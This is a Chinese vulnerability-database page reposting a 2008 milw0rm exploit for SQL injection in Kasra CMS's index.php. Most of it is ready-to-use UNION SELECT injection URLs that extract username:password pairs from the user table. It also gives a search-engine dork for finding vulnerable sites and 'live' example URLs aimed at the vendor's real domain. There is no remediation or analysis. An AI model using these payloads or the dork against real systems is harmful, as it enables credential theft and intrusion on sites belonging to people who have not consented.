Kasra CMS - 'index.php' Multiple SQL Injections

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056922 漏洞类型
发布时间 2008-10-25 更新时间 2008-10-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6837
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008


--[ DoRK ]--
intext:"2007-2008 Kasra ICT"


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--


--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-25]